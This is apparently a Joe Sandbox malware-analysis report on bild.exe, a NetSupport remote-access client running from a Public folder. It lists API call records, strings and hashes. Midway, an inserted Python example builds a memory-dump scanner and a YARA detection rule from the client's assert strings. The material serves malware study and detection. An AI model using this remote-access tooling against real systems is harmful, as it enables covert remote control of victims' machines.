                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumValue$CloseOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3785232357-0
                                                                                      • Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                      • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                      • Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                      • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                      • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepThread$CreateMessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 3347742789-0
                                                                                      • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                      • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,A1BC2D8B,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,A1BC2D8B,?,?,00000000), ref: 110B336F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                      • SetEvent.KERNEL32(?,?,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                      • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                      • SetFocus.USER32(?), ref: 11007353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                      • String ID: edit
                                                                                      • API String ID: 1305092643-2167791130
                                                                                      • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                      • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                      • _memmove.LIBCMT ref: 110092B6
                                                                                        • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                      • String ID: string too long
                                                                                      • API String ID: 2168136238-2556327735
                                                                                      • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                      • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 11041413
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                      Strings
                                                                                      • VolumeControl exception : %hs, xrefs: 11041431
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: VolumeControl exception : %hs
                                                                                      • API String ID: 3728558374-910296547
                                                                                      • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                      • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • _memmove.LIBCMT ref: 11147211
                                                                                      Strings
                                                                                      • Failed to get callstack, xrefs: 111471BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess_memmove
                                                                                      • String ID: Failed to get callstack
                                                                                      • API String ID: 4135527288-766476014
                                                                                      • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                      • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
APIs
• wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
• String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
• API String ID: 175691280-2052047905
• Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
• Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
• Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
• Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CreateThread__wcstoi64
• String ID: *TapiFixPeriod$Bridge
• API String ID: 1152747075-2058455932
• Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
• Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
• Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
• Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
APIs
• SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
• m_hWnd, xrefs: 11001096
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitItemLastProcessSendwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2046328329-2830328467
• Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
• Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
• Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
• Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
APIs
• SendMessageA.USER32(?,?,?,?), ref: 11001073
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
• m_hWnd, xrefs: 11001056
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitLastProcessSendwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 819365019-2830328467
• Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
• Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
• Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
• Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
APIs
• PostMessageA.USER32(?,?,?,?), ref: 11001103
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
• m_hWnd, xrefs: 110010E6
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitLastPostProcesswsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 906220102-2830328467
• Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
• Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
• Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
• Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
APIs
• ShowWindow.USER32(?,?), ref: 1100113B
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
• m_hWnd, xrefs: 11001126
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessShowWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1604732272-2830328467
• Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
• Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
• Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
• Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
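The window-wrapper records above (SendDlgItemMessageA, SendMessageA, PostMessageA, ShowWindow) and the wvsprintfA wrapper all fall through to the same failure handler at 11029450, which formats GetLastError with wsprintfA, shows a MessageBoxA captioned "Client32" and then calls ExitProcess; the strings they reference are CTL32 assert locations (the wndclass.h path with m_hWnd, the NSMString.cpp path with pszBuffer[1024]==0). The following is an added example, not code from the Joe Sandbox report or from NetSupport: it turns those strings into a memory-dump scan and emits the same check as a YARA rule. The marker names, the verdict rule (a source path plus the dialog caption) and the sample dump are assumptions constructed for the example; the literal strings are the ones the records above list.

```python
"""
Added example (not part of the Joe Sandbox report): scan a process memory
dump for the NetSupport CTL32 assert strings exposed by the function records
and emit an equivalent YARA rule.  Marker names, verdict logic and the sample
dump are constructed for the example; the literals come from the report.
"""
from typing import Dict, List

# Literal strings taken from the function records.
CTL32_MARKERS: Dict[str, str] = {
    # assert location pushed by the SendMessageA/PostMessageA/ShowWindow wrappers
    "ctl32_wndclass_path": r"e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h",
    # assert expression used together with that path
    "ctl32_wndclass_member": "m_hWnd",
    # assert location and expression in the wvsprintfA wrapper
    "ctl32_nsmstring_path": r"..\CTL32\NSMString.cpp",
    "ctl32_nsmstring_expr": "pszBuffer[1024]==0",
    # caption of the MessageBoxA shown by the shared handler before ExitProcess
    "assert_dialog_caption": "Client32",
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Return every offset of needle in buf (overlapping matches included)."""
    hits, pos = [], buf.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = buf.find(needle, pos + 1)
    return hits


def scan_dump(buf: bytes) -> Dict[str, List[int]]:
    """
    Map each marker to the offsets where it occurs in buf.  The ANSI form is
    what wsprintfA/MessageBoxA consume in the report; UTF-16LE is checked as
    well because the same literals may be embedded as wide strings elsewhere.
    """
    out: Dict[str, List[int]] = {}
    for name, text in CTL32_MARKERS.items():
        offs = find_all(buf, text.encode("ascii")) + find_all(buf, text.encode("utf-16-le"))
        if offs:
            out[name] = sorted(offs)
    return out


def looks_like_ctl32(hits: Dict[str, List[int]]) -> bool:
    """
    Example verdict (an assumption, not a NetSupport signature): require a
    source path plus the assert caption, so that a dump that only contains the
    generic word "Client32" or only "m_hWnd" does not fire.
    """
    has_path = "ctl32_wndclass_path" in hits or "ctl32_nsmstring_path" in hits
    return has_path and "assert_dialog_caption" in hits


def to_yara(rule_name: str = "netsupport_ctl32_assert_strings") -> str:
    """Emit the same check as YARA rule text; backslashes and quotes are escaped."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for name, text in CTL32_MARKERS.items():
        escaped = text.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        ${name} = "{escaped}" ascii wide')
    lines += [
        "    condition:",
        "        ($ctl32_wndclass_path or $ctl32_nsmstring_path) and $assert_dialog_caption",
        "}",
    ]
    return "\n".join(lines)


# Constructed dump: filler around the ANSI literals plus one wide copy of the
# caption, standing in for the 11001000 image section in the report.
SAMPLE_DUMP = (
    b"\x00" * 16
    + rb"e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h" + b"\x00"
    + b"m_hWnd\x00"
    + b"\x90" * 8
    + b"Client32\x00"
    + "Client32".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for marker, offsets in found.items():
        print(f"{marker:24s} {[hex(o) for o in offsets]}")
    print("ctl32 assert strings present:", looks_like_ctl32(found))
    print(to_yara())
```

Run against a real dump, read the .sdmp file into `buf` and pass it to `scan_dump`; the offsets are relative to the start of the file, so add the dump's base (11000000 for the source file listed above) to map them back to the xrefs in the records.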
                                                                                      APIs
                                                                                      • KillTimer.USER32(?,?), ref: 1100102B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                      • m_hWnd, xrefs: 11001016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
